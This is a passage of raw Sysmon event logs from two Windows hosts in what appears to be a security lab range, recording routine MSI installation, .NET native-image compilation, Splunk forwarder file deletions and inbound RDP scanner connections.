14:58:30.060{A7A01FEF-EC12-607E-420E-00000000BB01}63164112C:\Windows\SysWOW64\msiexec.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+2995e(wow64)|C:\Windows\System32\shcore.dll+29cab(wow64)|C:\Windows\System32\SHELL32.dll+128d40(wow64)|C:\Windows\System32\SHELL32.dll+1924cf(wow64)|C:\Windows\System32\msi.dll+1bfb40(wow64)|C:\Windows\System32\msi.dll+9d48e(wow64)|C:\Windows\System32\msi.dll+9e67b(wow64)|C:\Windows\System32\msi.dll+1d4520(wow64)|C:\Windows\System32\msi.dll+152639(wow64)|C:\Windows\SysWOW64\msiexec.exe+49d4|C:\Windows\SysWOW64\msiexec.exe+4ed8|C:\Windows\SysWOW64\msiexec.exe+6af7 10341000x800000000000000079975Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.060{A7A01FEF-EC12-607E-420E-00000000BB01}63164112C:\Windows\SysWOW64\msiexec.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+128d32(wow64)|C:\Windows\System32\SHELL32.dll+1924cf(wow64)|C:\Windows\System32\msi.dll+1bfb40(wow64)|C:\Windows\System32\msi.dll+9d48e(wow64)|C:\Windows\System32\msi.dll+9e67b(wow64)|C:\Windows\System32\msi.dll+1d4520(wow64)|C:\Windows\System32\msi.dll+152639(wow64) 10341000x800000000000000079974Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.060{A7A01FEF-EC12-607E-420E-00000000BB01}63164112C:\Windows\SysWOW64\msiexec.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+128d32(wow64)|C:\Windows\System32\SHELL32.dll+1924cf(wow64)|C:\Windows\System32\msi.dll+1bfb40(wow64)|C:\Windows\System32\msi.dll+9d48e(wow64)|C:\Windows\System32\msi.dll+9e67b(wow64)|C:\Windows\System32\msi.dll+1d4520(wow64)|C:\Windows\System32\msi.dll+152639(wow64)|C:\Windows\SysWOW64\msiexec.exe+49d4 13241300x800000000000000079973Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:30.060{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{C17F6DEF-D34C-4B75-97E1-D81062408B4A}\URLUpdateInfo(Empty) 13241300x800000000000000079972Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:30.060{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{C17F6DEF-D34C-4B75-97E1-D81062408B4A}\PublisherMicrosoft Corporation 13241300x800000000000000079971Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:30.060{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{C17F6DEF-D34C-4B75-97E1-D81062408B4A}\InstallSourceC:\ProgramData\Microsoft\DefaultPackMSI\ 10341000x800000000000000079970Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.044{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC16-607E-540E-00000000BB01}5340C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079969Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.029{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC16-607E-540E-00000000BB01}5340C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079968Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.013{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC16-607E-540E-00000000BB01}5340C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000050547Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:30.950{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F381D27B3F87EF430E477058E2A6A0A1,SHA256=99BE9CF941AD73CDA8C57B31825A15B22FBE008A339933F54AADDFA9E434CFAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050546Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:30.591{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=56BEACFBB6243A9CBC7C9DB1700FCD23,SHA256=31CB410E9D5FC2531EF279ABFF3E5979E539BF7E874C9FDEB7CD24FDED37C6A9,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050545Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:28.434{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com51461-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050544Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:28.164{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com59900-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050543Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:27.855{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-51386-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 10341000x800000000000000080077Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:31.935{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC17-607E-680E-00000000BB01}3712C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080076Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:31.935{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC17-607E-680E-00000000BB01}3712C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080075Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:31.935{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71204028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC17-607E-680E-00000000BB01}3712C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080074Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:31.888{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC17-607E-670E-00000000BB01}7012C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080073Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:31.888{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC17-607E-670E-00000000BB01}7012C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080072Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:31.888{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC17-607E-670E-00000000BB01}7012C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000080071Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:31.836{A7A01FEF-EC17-607E-660E-00000000BB01}6372C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\18e4-0\Microsoft.Office.Tools.Common.Implementation.dll2021-04-20 14:58:31.836 23542300x800000000000000080070Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:31.810{A7A01FEF-C0A6-607E-8105-00000000BB01}836ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000017.dbMD5=96771C2712AB8C0F25941DE6E6E0B109,SHA256=209557BA5C58F58CD02052C6AAF3EB4A3806E1256DC103237D0EB7484F6D9AA5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080069Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:31.297{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC17-607E-660E-00000000BB01}6372C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080068Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:31.276{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC17-607E-660E-00000000BB01}6372C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080067Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:31.276{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71204028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC17-607E-660E-00000000BB01}6372C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000080066Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:31.236{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=55F8C3C0DFE0C7FCD039D1144473934B,SHA256=7C33EDFD9D669A2719224E8B20AC03D64C0354DD205A71AF07B743B1CB647200,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080065Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:31.236{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC17-607E-650E-00000000BB01}5076C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080064Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:31.210{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC17-607E-650E-00000000BB01}5076C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080063Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:31.210{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC17-607E-650E-00000000BB01}5076C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000080062Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:31.186{A7A01FEF-EC16-607E-640E-00000000BB01}6544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1990-0\Microsoft.Office.Tools.Common.dll2021-04-20 14:58:31.186 23542300x800000000000000080061Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:31.146{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=F4CDCB76C6368D1BDA97083E135FFFF0,SHA256=A463FD560958442EB22E7AC495F69EE7AFA64830DA2C4083BE67C71D6E594679,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080060Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:31.146{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C3057825E0E5A92DAB8CC35BCF988335,SHA256=15453AD60A4C989A81926F5B2F0206D2BCC6543ADCEA18F8821186D6A8ED5999,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050548Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:31.950{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A55B6E16AF3A5C78F882FEC16399342,SHA256=A8B41B440CE2CFA94035771FA6AB3F3B8BA844422AB748A27FA4CA3BCF5ABE39,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080099Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 